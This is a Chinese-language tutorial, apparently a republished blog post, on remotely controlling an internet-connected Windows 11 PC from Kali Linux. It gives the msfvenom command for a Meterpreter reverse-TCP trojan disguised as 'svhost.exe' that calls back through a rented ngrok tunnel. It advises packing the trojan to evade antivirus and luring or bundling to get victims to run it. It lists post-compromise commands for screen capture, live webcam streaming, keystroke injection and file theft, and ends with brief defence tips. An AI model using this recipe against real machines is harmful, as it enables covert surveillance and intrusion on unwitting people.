僅限于技術(shù)交流,請(qǐng)勿用于非法用途!
網(wǎng)上很多的教程都是在VMware虛擬機(jī)中實(shí)現(xiàn)通過(guò)kali linux控制windows電腦,正巧我這兒有閑置的筆記本,為了更真實(shí)的模擬黑客攻擊電腦的行為,做以下實(shí)驗(yàn):
使用工具:
虛擬機(jī):Vmware Workstation
控制端系統(tǒng):Kali Linux
內(nèi)網(wǎng)穿透:sunny-ngrok
被控端系統(tǒng):Windows 11
一、安裝Vmware Workstation軟件,搭建Kali Linux虛擬機(jī)
本實(shí)驗(yàn)使用VM15虛擬機(jī):

注意,因?yàn)槲覀冏罱K要實(shí)現(xiàn)通過(guò)kali控制外網(wǎng)的電腦,因此我們要將網(wǎng)絡(luò)連接改為橋接模式
二、建立隧道
隧道的目的為了將被控端的內(nèi)網(wǎng)的數(shù)據(jù)傳輸?shù)酵饩W(wǎng),以便使用kali進(jìn)行遠(yuǎn)程控制
這里我們使用Sunny-Ngrok的內(nèi)網(wǎng)穿透服務(wù)(測(cè)試使用了三天,挺穩(wěn)定的)
1、用戶注冊(cè)
2、實(shí)名認(rèn)證
3、購(gòu)買隧道

Sunny-Ngrok官網(wǎng)有詳細(xì)教程,本文就不細(xì)說(shuō)了,直接購(gòu)買即可,總共花了¥8(使用時(shí)間一個(gè)月)
4、建立隧道
隧道協(xié)議選tcp,隧道名稱和遠(yuǎn)程端口都需要自己定,本地ip為kali的ip,本地端口自己定:

建立好之后會(huì)生成隧道id,隧道id一定要保密:

5、點(diǎn)擊客戶端下載,選擇Linux(32Bit還是64Bit要看自己筆記本是多少位的[目前大多數(shù)都是64位])
使用unzip命令把下載好的客戶端解壓出來(lái),啟動(dòng)客戶端:

此時(shí)隧道建立成功:

三、制作木馬
在kali中使用msf工具制作木馬(木馬本例命名為svhost.exe,大家可以自行設(shè)置):

命令如下:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=遠(yuǎn)程地址 LPORT=隧道端口 -f exe > /root/svhost.exe
四、加殼
大家根據(jù)自己需要,因?yàn)槲沂顷P(guān)閉殺毒軟件進(jìn)行測(cè)試的,包括被控端(windows 11)的微軟的安全中心也是關(guān)閉的
加殼的目的是為了防止殺毒軟件報(bào)毒,以免被殺,至于使用什么加殼工具,網(wǎng)上很多,大家可以自行選擇,如果感興趣的可以把生成出來(lái)的木馬編譯一下,已達(dá)到免殺的目的
五、開(kāi)啟本地監(jiān)聽(tīng),查看配置,執(zhí)行exploit/run等待被控端運(yùn)行

六、木馬上線
可以使用誘導(dǎo)、捆綁、遠(yuǎn)程執(zhí)行等方式讓其運(yùn)行~
因?yàn)楸纠龑儆趯?shí)驗(yàn)測(cè)試,所以直接拿U盤拷貝過(guò)去執(zhí)行上線即可

小電腦的屏幕為kali在msf中執(zhí)行screenshot命令的截圖,截取大電腦當(dāng)前的屏幕信息(右邊顯示器的信息為隧道頁(yè)面,忽略即可)
遠(yuǎn)程開(kāi)啟電腦攝像頭視頻
上面的視頻為2023年1月26日在kalilinux系統(tǒng)中使用msf工具執(zhí)行webcam_stream命令遠(yuǎn)程調(diào)用實(shí)時(shí)攝像頭畫面(不太會(huì)打碼,不過(guò)web頁(yè)面中的字可以看清楚)
當(dāng)拿到被控端權(quán)限之后,還可以做的包含但不限于:
sysinfo 獲取有關(guān)遠(yuǎn)程系統(tǒng)的信息
getdesktop 獲取當(dāng)前meterpreter桌面
keyboard_send 發(fā)送鍵擊
mouse 發(fā)送鼠標(biāo)事件
screenshare 屏幕共享實(shí)時(shí)監(jiān)視遠(yuǎn)程用戶桌面
screenshot 截圖獲取交互式桌面的截圖
webcam_stream 遠(yuǎn)程開(kāi)啟攝像頭
上傳下載被控端的內(nèi)容等等等等
如果是內(nèi)網(wǎng),很有可能拿下內(nèi)網(wǎng)的更多電腦權(quán)限^_^
七、防范
1、陌生的.exe不要輕易執(zhí)行,一定要從官網(wǎng)下載軟件
2、windows的安全中心不要關(guān)閉!不要關(guān)閉!不要關(guān)閉!
3、安裝殺毒軟件(和第二點(diǎn)并不沖突)文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-639524.html
4、……文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-639524.html
到了這里,關(guān)于模擬黑客使用Kali Linux遠(yuǎn)程控制Windows(互聯(lián)網(wǎng))的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!